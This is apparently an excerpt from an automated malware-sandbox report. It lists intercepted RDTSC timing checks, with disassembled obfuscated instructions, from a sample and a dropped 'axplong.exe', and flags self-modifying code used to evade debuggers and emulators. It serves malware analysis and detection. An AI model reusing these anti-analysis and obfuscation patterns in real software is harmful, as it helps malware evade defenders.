Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C072F second address: 54C07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [7732B370h] 0x0000000d pushad 0x0000000e call 00007FC350C3E726h 0x00000013 pushfd 0x00000014 jmp 00007FC350C3E722h 0x00000019 and ecx, 47072558h 0x0000001f jmp 00007FC350C3E71Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 push edi 0x00000027 mov si, 182Bh 0x0000002b pop eax 0x0000002c popad 0x0000002d xor dword ptr [ebp-08h], eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC350C3E71Dh 0x00000037 and si, 58F6h 0x0000003c jmp 00007FC350C3E721h 0x00000041 popfd 0x00000042 movzx eax, di 0x00000045 popad 0x00000046 xor eax, ebp 0x00000048 jmp 00007FC350C3E728h 0x0000004d nop 0x0000004e pushad 0x0000004f pushad 0x00000050 call 00007FC350C3E71Ch 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C07D9 second address: 54C0838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC3507E5381h 0x0000000b and ecx, 233FAE66h 0x00000011 jmp 00007FC3507E5381h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FC3507E5381h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC3507E5388h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0838 second address: 54C083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C083E second address: 54C086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3507E5387h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C086C second address: 54C08BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 and ax, 510Eh 0x0000000e jmp 00007FC350C3E729h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f mov dx, 8D9Ch 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 mov di, DD46h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08BE second address: 54C08C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08C2 second address: 54C08C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08C6 second address: 54C08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08CC second address: 54C08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C08DC second address: 54C0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC3507E5380h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0904 second address: 54C0908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0908 second address: 54C090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C090E second address: 54C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov ebx, 4C08AD90h 0x00000011 popad 0x00000012 jne 00007FC3C29ADB11h 0x00000018 pushad 0x00000019 pushad 0x0000001a push edi 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007FC350C3E727h 0x00000022 adc al, FFFFFFEEh 0x00000025 jmp 00007FC350C3E729h 0x0000002a popfd 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007FC350C3E720h 0x00000032 xor ax, 3368h 0x00000037 jmp 00007FC350C3E71Bh 0x0000003c popfd 0x0000003d popad 0x0000003e sub eax, eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FC350C3E722h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09A2 second address: 54C09F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3507E5381h 0x00000009 sbb ecx, 00B61C36h 0x0000000f jmp 00007FC3507E5381h 0x00000014 popfd 0x00000015 call 00007FC3507E5380h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [ebp-20h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC3507E537Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09F4 second address: 54C09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09FA second address: 54C09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C09FE second address: 54C0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [esi] 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [ebp-24h], ebx 0x0000001a pushad 0x0000001b mov dx, 01A6h 0x0000001f call 00007FC350C3E727h 0x00000024 mov ah, 5Bh 0x00000026 pop ebx 0x00000027 popad 0x00000028 test ebx, ebx 0x0000002a pushad 0x0000002b mov edx, esi 0x0000002d mov esi, 083ACC19h 0x00000032 popad 0x00000033 je 00007FC3C29AD950h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC350C3E71Bh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0A56 second address: 54C0ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC3507E5383h 0x00000015 jmp 00007FC3507E5383h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FC3507E5388h 0x00000021 sub si, D998h 0x00000026 jmp 00007FC3507E537Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54C0ACC second address: 54C0AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0D86 second address: 54B0D95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 54B0D95 second address: 54B0DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC350C3E722h 0x00000009 sub ecx, 312797B8h 0x0000000f jmp 00007FC350C3E71Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov dx, ax 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 6EF293 second address: 6EF299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 6EF299 second address: 6EF29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867689 second address: 86769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867960 second address: 867966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867966 second address: 867974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3507E5376h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 867AB8 second address: 867AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86AE02 second address: 86AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86AF67 second address: 86AF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC350C3E71Bh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86B0B0 second address: 86B0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86B14D second address: 86B157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 86B157 second address: 86B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 853688 second address: 85368C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 85368C second address: 85369D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888751 second address: 88875D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC350C3E716h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888890 second address: 888896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888896 second address: 8888A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC350C3E716h 0x0000000d jnc 00007FC350C3E716h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8889FE second address: 888A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888A0F second address: 888A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888A13 second address: 888A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888CE4 second address: 888CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888DFA second address: 888E06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888E06 second address: 888E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e pop esi 0x0000000f jc 00007FC350C3E71Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC350C3E729h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888E4A second address: 888EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 jmp 00007FC3507E5384h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3507E537Ah 0x00000014 jmp 00007FC3507E537Fh 0x00000019 popad 0x0000001a jns 00007FC3507E537Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888EA8 second address: 888EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 888EAE second address: 888EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8891B1 second address: 8891C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 889362 second address: 889392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 jo 00007FC3507E5376h 0x0000000e jnl 00007FC3507E5376h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FC3507E5376h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 889392 second address: 889396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88A460 second address: 88A466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88A466 second address: 88A46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88DB4C second address: 88DB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88DB50 second address: 88DB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 88E282 second address: 88E294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jp 00007FC3507E5376h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89539A second address: 89539E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 894B21 second address: 894B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3507E5381h 0x0000000f popad 0x00000010 push ecx 0x00000011 jo 00007FC3507E5376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 894B46 second address: 894B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 894F90 second address: 894FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3507E5376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC3507E5378h 0x00000012 popad 0x00000013 js 00007FC3507E538Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FC3507E5376h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898917 second address: 898926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898926 second address: 898945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007FC3507E5376h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898945 second address: 8989A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC350C3E718h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FC350C3E719h 0x00000027 jmp 00007FC350C3E71Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jnp 00007FC350C3E716h 0x00000035 jmp 00007FC350C3E728h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8989A9 second address: 8989DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007FC3507E538Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007FC3507E5380h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 8989DF second address: 8989FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Fh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898C9B second address: 898CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 898CA1 second address: 898CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC350C3E716h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 899565 second address: 89956B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89956B second address: 89956F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89956F second address: 899585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov si, FEF0h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 899585 second address: 899598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 899A89 second address: 899AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89A009 second address: 89A00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89A744 second address: 89A748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89A748 second address: 89A74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89C3EC second address: 89C3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E537Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	RDTSC instruction interceptor: First address: 89DD8C second address: 89DD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 50EB0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 6ADC6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 50EAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Special instruction interceptor: First address: 7395EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 6EEB0F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 88DC6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 6EEAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 9195EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Special instruction interceptor: First address: 942047 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Special instruction interceptor: First address: 940858 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Special instruction interceptor: First address: 9D7FD4 instructions caused by: Self-modifying code
